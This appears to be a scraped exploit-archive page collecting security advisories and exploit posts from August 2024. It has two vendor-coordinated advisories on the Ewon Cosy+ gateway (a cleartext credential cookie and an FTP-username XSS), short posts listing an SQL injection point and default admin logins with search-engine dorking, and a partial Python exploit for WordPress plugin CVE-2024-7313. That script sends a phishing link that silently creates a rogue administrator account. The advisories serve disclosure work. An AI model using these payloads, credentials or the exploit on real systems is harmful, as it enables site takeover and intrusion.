The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. The credentials used for the basic authentication against the web interface of Cosy+ are stored in the cookie "credentials" after a successful login. An attacker with access to a victim's browser is able to retrieve the administrative password of Cosy+.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-017  
Product:                   Ewon Cosy+  
Manufacturer:              HMS Industrial Networks AB  
Affected Version(s):       Firmware Versions: < 21.2s10 and < 22.1s3  
Tested Version(s):         Firmware Version: 21.2s7  
Vulnerability Type:        Cleartext Storage of Sensitive Information in a Cookie (CWE-315)  
Risk Level:                Low  
Solution Status:           Fixed  
Manufacturer Notification: 2024-03-27  
Solution Date:             2024-07-18  
Public Disclosure:         2024-08-11  
CVE Reference:             CVE-2024-33892  
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"

Due to cleartext storage of the password in a cookie, an attacker with  
appropriate access is able to retrieve the plaintext administrative  
password.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The credentials used for the basic authentication against the web  
interface of Cosy+ are stored in the cookie "credentials" after a  
successful login.

An attacker with access to a victim's browser is able to retrieve the  
administrative password of Cosy+.

In addition, the cookie is not secured (no HttpOnly, Secure or  
SameSite attribute is set). Thus, the credentials could also be extracted  
in combination with cross-site scripting (XSS) vulnerabilities.

Note: During the responsible disclosure process, SySS GmbH became aware of  
CVE-2015-7928[8], which describes an issue with password autocomplete  
in Ewon devices. Since this function contains the problematic cookie,  
this CVE may already describe the insecure cookie. SySS GmbH would therefore  
like to credit the reporter of CVE-2015-7928, Karn Ganeshen.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. "credentials" cookie value: YWRtOlN1cDNyUzNjcjN0IyM=

2. Decoded credentials:  
     #> echo -n "YWRtOlN1cDNyUzNjcjN0IyM=" | base64 -d  
         adm:Sup3rS3cr3t##

Bonus: accessing the cookie from JavaScript code:  
<script>alert("Credentials can be access via JavaScript" + document.cookie)</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to the manufacturer note[4], the vulnerability was fixed  
with the firmware versions 21.2s10 and 22.1s3.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-03-26: Vulnerability discovered  
2024-03-27: Vulnerability reported to manufacturer  
2024-04-02: Inquiry about the status  
2024-04-05: Manufacturer acknowlegded the vulnerability and started the  
             analysis  
2024-04-10: Two more vulnerabilities reported to the manufacturer  
             (SYSS-2024-032 and SYSS-2024-033)  
2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for  
             a publication date for all findings  
2024-04-12: Proposed dates for a discussion about publication  
2024-04-15: Manufacturer sent a technical overview of planned remediation  
             actions and details about the planned timeline  
2024-04-15: Acknowlegded the remediation actions and asked the manufacturer  
             to assign a CVE ID  
2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer  
2024-05-31: Manufacturer informed that the fix is in completion stage and  
             asked if the blog post[6] can be reviewed by HMS  
2024-06-04: Proposed dates to review the blog post draft  
2024-06-21: Inquiry about the status  
2024-06-21: Received an out-of-office auto reply  
2024-07-01: Inquiry about the status  
2024-07-04: Inquiry about the status  
2024-07-12: Inquiry about the status and letting the manufacturer know that  
             the vulnerability will be published within a talk at DEF CON[7]  
             in August  
2024-07-12: Manufacturer responded that the fix is planned by the end of  
             July; manufacturer asked again for reviewing the blog post  
             draft  
2024-07-12: Again confirmed reviewing the blog post is possible and asking  
             for the sending of details  
2024-07-17: Blog post provided to HMS  
2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post and confirmed that a  
             fix is provided  
2024-07-29: Discussion with HMS about the blog post and final publication  
             actions  
2024-08-11: Vulnerability disclosed at DEF CON[7]  
2024-08-11: Blog post published[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website  
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet  
[2] SySS Security Advisory SYSS-2024-017  
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-017.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy  
[4] Manufacturer note  
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf  
[5] CVE-2024-33892  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33892  
[6] Blog post  
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/  
[7] DEF CON talk  
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521  
[8] CVE-2015-7928  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7928

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@syss.de  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay4zQACgkQrgyb+PE0  
i1Oq5hAApN8Ekc20CgEg5KyIFK18sKBPzSA/SeZcSdUOkv8N05riytWxbVFuLBpS  
LhHH9spxUjn6Sr36JDp5dISCj9rtajrNE/adIiNC9LUhBRIr2h1ogFfh5zKK8N9D  
m4CXknQ3b2QQctkuhywyKSKjvNnvxj+k6nDIFlTzXdl3e9cEpisaAFr8zt9/jb7d  
ZBt8HHrEvJRCa5eBK40r0t42xFiWILh98enmLVCM2VOUnaAxz6JXLTunRSXqC6WH  
SzEOR/G32z+NxNCphPuswlIqfnhoaOFQ7oP2miuGglDdm5yWQX6E+xtp5HUelmkS  
DyZ6nUPOmr67lOgOUIhtIQp4zRYNiQAvDv70x9k/RCv+VDG4B5qEffFIbq6JgSCW  
Q+5iQXfDEJwuj0ePIe/wO+svn7C7LOSfvRfjw39GF0gTeKhPi8cNj5S+Jpl3M6pP  
XWEHcHzhVze9t5CLFgkh4GtmqH4OvWvFxn8d3x5h21eljloobUNZXAWlUYJdb6Ae  
gNhWD3IKQJyPo/4cyDC5iZS6QtivjyiQUb6aU6vqKWcR7tlnr7jferG00Q3Sz8R2  
ddC8Vw78j2GvzyCibNhSoKGfjQAOhYgfsH8ktRDQ/zDYguT4cHA++V16MbfXwIv0  
y3mQqModAAlpqYGVf4783H24kuyP19KewZuj5dSsMTyShIcTkCU=  
=LXSO  
-----END PGP SIGNATURE-----

Ewon Cosy+ Password Disclosure

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. If login against the FTP service of the Cosy+ fails, the submitted username is saved in a log. This log is included in the Cosy+ web interface without neutralizing the content. As a result, an unauthenticated attacker is able to inject HTML/JavaScript code via the username of an FTP login attempt.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-016  
Product:                   Ewon Cosy+  
Manufacturer:              HMS Industrial Networks AB  
Affected Version(s):       Firmware Versions: < 21.2s10 and < 22.1s3  
Tested Version(s):         Firmware Version: 21.2s7  
Vulnerability Type:        Improper Neutralization of Input During Web Page Generation (CWE-79)  
Risk Level:                Medium  
Solution Status:           Fixed  
Manufacturer Notification: 2024-03-27  
Solution Date:             2024-07-18  
Public Disclosure:         2024-08-11  
CVE Reference:             CVE-2024-33893  
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"

Due to improper neutralization of input, an unauthenticated attacker  
is able to inject HTML and JavaScript code into the administrative  
web interface of the device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

If login against the FTP service of the Cosy+ fails, the submitted  
username is saved in a log.  
This log is included in the Cosy+ web interface without neutralizing  
the content.  
As a result, an unauthenticated attacker is able to inject  
HTML/JavaScript code via the username of an FTP login attempt.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Login attempt against Cosy+ FTP service:  
     #> ftp "<script src=//x>"@192.168.10.33

2. JavaScript is included when visiting the event logs on Cosy+ web  
     interface (http://192.168.10.33/index.shtm#EVLogsTbl):

     <div class="x-grid-cell-inner " style="text-align:left;">  
         eftp-Close FTP session (User: <script src="//x">  
     </div">

Note:  
     The FTP username is limited to 16 characters and therefore the  
     payload length is limited too.  
     However, exploitation is still possible, e.g. by controlling  
     DNS responses or using short URLs, e.g. an emoji domain.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to the manufacturer note[4], the vulnerability was fixed  
with the firmware versions 21.2s10 and 22.1s3.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-03-26: Vulnerability discovered  
2024-03-27: Vulnerability reported to manufacturer  
2024-04-02: Inquiry about the status  
2024-04-05: Manufacturer acknowlegded the vulnerability and started the  
             analysis  
2024-04-10: Two more vulnerabilities reported to the manufacturer  
             (SYSS-2024-032 and SYSS-2024-033)  
2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for  
             a publication date for all findings  
2024-04-12: Proposed dates for a discussion about publication  
2024-04-15: Manufacturer sent a technical overview of planned remediation  
             actions and details about the planned timeline  
2024-04-15: Acknowlegded the remediation actions and asked the manufacturer  
             to assign a CVE ID  
2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer  
2024-05-31: Manufacturer informed that the fix is in completion stage and  
             asked if the blog post[6] can be reviewed by HMS  
2024-06-04: Proposed dates to review the blog post draft  
2024-06-21: Inquiry about the status  
2024-06-21: Received an out-of-office auto reply  
2024-07-01: Inquiry about the status  
2024-07-04: Inquiry about the status  
2024-07-12: Inquiry about the status and letting the manufacturer know that  
             the vulnerability will be published within a talk at DEF CON[7]  
             in August  
2024-07-12: Manufacturer responded that the fix is planned by the end of  
             July; manufacturer asked again for reviewing the blog post  
             draft  
2024-07-12: Again confirmed reviewing the blog post is possible and asking  
             for the sending of details  
2024-07-17: Blog post provided to HMS  
2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post and confirmed that a  
             fix is provided  
2024-07-29: Discussion with HMS about the blog post and final publication  
             actions  
2024-08-11: Vulnerability disclosed at DEF CON[7]  
2024-08-11: Blog post published[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website  
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet  
[2] SySS Security Advisory SYSS-2024-016  
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-016.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy  
[4] Manufacturer note  
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf  
[5] CVE-2024-33893  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33893  
[6] Blog post  
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/  
[7] DEF CON talk  
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@syss.de  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay4vsACgkQrgyb+PE0  
i1M+GA//R3tvHZW7B21Kf+8aZcVONuL56yzPOyqEdISB0joFi9yvzGkqCJPYws5t  
vFojVlZT38COf64ZC2siFQCJrtOzMa+zWT3kpSeBFsNQ60Sx79UaCdQVa6GjpZm/  
8qSNWtCpOMGmj95FwYaHuZbKxiSifyIjsVteADqiaysWVx7kXapktPSD2KiOBJSp  
Ycg81WfRS10ELiUWoLZ5GTXhzQKzH0Tsh6h1qNHWy5GkHLwIQKkzicQ5wR1ZRzK4  
o6k8cJySgAqgJ3gmGU9iUUElppPXj7EFOK7m8q0ny5gQpQfz3dMPxJz5eK8zBazd  
1c9OjgdZNcgzschhKsl/JX+3YVGQzmNo5rSOIbJS4+7Oe0UcTaggzbgj80GGOakT  
vLC9GqmgYUsv+yr2Dp10pUg/plySeScDhYlkZ+VN9GDcEVodiKzM6wukj1eDEw0+  
6CzHKnGvKOa322AVnKF+xdB/c+sDCEaD73S47gt8CfG57J7bcpth3Gf9RkLtLFXC  
U3yiT7FmY/KH7WZvmnyhsk/Go66aGRy0d1hQl/tzdnBVdDn1IZToymnC/YVDxqxc  
Q9GsDhkpDOyozgrhUdef64RY5ZOzXcpNJvCM1RxjP65ZMxiPpZ0z/3IuGJ+DUWkM  
f8Sm21hfsgkq8UmnLtSnDCUyPTxJISTK9lwleYkqodqJrXUlUD0=  
=HV5Q  
-----END PGP SIGNATURE-----

Ewon Cosy+ Improper Neutralization / Cross Site Scripting

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

**Jobs Finder System 1.0 SQL Injection**

Posted Aug 19, 2024

Authored by indoushka

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 0e14944aabacd3bde55dc9ca768a85b25224b5d197aed3ef9cecb63e14d97575

Download | Favorite | View

**Jobs Finder System 1.0 SQL Injection**

    =============================================================================================================================================| # Title     : jobs Finder System v1.0 SQL injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Jobs_Finder_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /jobs.php?id=3 <=== inject here[+] http://127.0.0.1/jobportal-master/jobs.php?id=3 [+]  Login : http://127.0.0.1/jobportal-master/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Jobs Finder System 1.0 SQL Injection

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Human Resource Management System 2024 1.0 Insecure Settings**

Posted Aug 19, 2024

Authored by indoushka

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | bf20205d0167adcb0c48749ed7a50372cba24a18938ecfb734926b5099542af1

Download | Favorite | View

**Human Resource Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = admin#123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Human Resource Management System 2024 1.0 Insecure Settings

Bhojon Restaurant Management System version 3.0 suffers from an ignored default credential vulnerability.

**Bhojon Restaurant Management System 3.0 Insecure Settings**

Posted Aug 19, 2024

Authored by indoushka

Bhojon Restaurant Management System version 3.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 5040244ae54e0b0c8ba29ab2d3b854826d64f8640404907653ffda5ea3f38ca6

Download | Favorite | View

**Bhojon Restaurant Management System 3.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Bhojon restaurant management system v3.0 Insecure Settings Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.bdtask.com/restaurant-management-system.php#live_demo                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@example.com & pass = 12345[+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdateGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Bhojon Restaurant Management System 3.0 Insecure Settings

WordPress Shield Security plugin versions 20.0.5 and below cross site scripting exploit that adds an administrative user.

# Exploit Title: CVE-2024-7313 - Reflected XSS to Unauthorised Administrator Account Creation  
# Google Dork: inurl:"/wp-content/plugins/wp-simple-firewall/" (Cannot find version numbers from this DORK)  
# Date: 16/08/2024  
# Exploit Author: Tim Lepp  
# Vendor Homepage: https://getshieldsecurity.com/  
# Software Link: https://wordpress.org/plugins/wp-simple-firewall/advanced/ (Version <= 20.0.5)  
# Version: <20.0.6  
# Tested on: Ubuntu  
# CVE : CVE-2024-7313

How It Works

  *   The script first checks if the target WordPress installation is using a vulnerable version of the Shield Security plugin by examining the response from the wp-login.php page.  
  *   If the plugin version is vulnerable, it proceeds to generate a reflected XSS payload that, when executed, will create a new admin user with a hardcoded password as WordPress wont accept weak passwords without user intervention.  
  *   The payload is created to first use a GET request to dynamically find the WordPress nonce used for account creation, then use that nonce to submit a POST request to the user creation endpoint with the details of the new user given in the script.  
  *  
The payload is then URL-encoded and displayed for use in the attack.  
  *  
Once sent to an administrator of the site and the link is clicked, a new Administrator user will be created on the site with the details parsed by the script. This is all done in the background, with the phished administrator being redirected to the Shield Security dashboard with no clue of the exploit in the background.

Reference  
https://research.cleantalk.org/cve-2024-7313/

Found also at https://github.com/Wayne-Ker/CVE-2024-7313/tree/main

--- code ---

import sys  
import urllib.parse  
import requests  
from bs4 import BeautifulSoup

# Color codes for terminal output  
red = '\033[91m'  
green = '\033[92m'  
yellow = '\033[93m'  
blue = '\033[96m'  
purple = '\033[95m'  
reset = '\033[0m'

# Banner and vulnerability information - Displayed at the start of the script  
def print_banner():  
    print(f"""{red}  
#############################################################################  
#                                                                           #  
#                                                                           #  
#   ______     _______     ____   ___ ____  _  _       _____ _____ _ _____  #  
#  / ___\ \   / | ____|   |___ \ / _ |___ \| || |     |___  |___ // |___ /  #  
# | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ / /  |_ \| | |_ \  #  
# | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ /  ___) | |___) | #  
#  \____|  \_/  |_____|   |_____|\___|_____|  |_|      /_/  |____/|_|____/  #  
#                                                                           #  
#    Shield Security Plugin Vulnerability (CVE-2024-7313)                   #  
#    Reflected XSS in WordPress Shield Security Plugin                      #  
#    Versions Affected: < 20.0.6                                            #  
#    Risk: High                                                             #  
#    Discovered by: Wayne-Kerr                                              #  
#    Published: August 7, 2024                                              #  
#############################################################################   
    {reset}""")

# Help menu - Provides instructions when '-h' or '--help' is used  
def print_help():  
    print(f"""{yellow}  
Usage: python3 exploit.py <target_url>

Example:  
    python3 exploit.py http://example.com

Options:  
    -h, --help    Show this help message and exit  
{reset}""")

# Format the target URL - Ensures the URL starts with "http://" or "https://"  
def format_target_url(target_url):  
    if target_url.startswith("http://") or target_url.startswith("https://"):  
        return target_url  
    else:  
        return f"http://{target_url}"

# Check if the target is vulnerable by accessing the wp-login.php page  
def check_vulnerability(target_url):  
    try:  
        response = requests.get(f"{target_url}/wp-login.php")  
        if response.status_code == 200:  
            # Try to extract version information from the response  
            version_info = response.text.split("ver=")[-1].split("\"")[0]  
            version = version_info.split(".")  
            major_version = int(version[0])  
            minor_version = int(version[1])  
            patch_version = int(version[2].split('&')[0])

            # Check if the version is below 20.0.6  
            if major_version < 20 or (major_version == 20 and minor_version == 0 and patch_version < 6):  
                print(f"{green}Shield Security version is vulnerable. Let's continue.{reset}")  
                return True  
            else:  
                print(f"{yellow}Version not vulnerable.{reset}")  
                return False  
        else:  
            print(f"{red}Failed to retrieve the version information.{reset}")  
            return False  
    except Exception as e:  
        print(f"{red}Error occurred while checking vulnerability: {e}{reset}")  
        return False

# Generate the XSS payload URL that exploits the vulnerability  
def generate_xss_payload(target_url, username, email, first_name, last_name):  
    # Hardcoded password for the new admin account to be created  
    hardcoded_password = "HaxorStrongAFPassword123!!"

    # The payload template for the XSS attack  
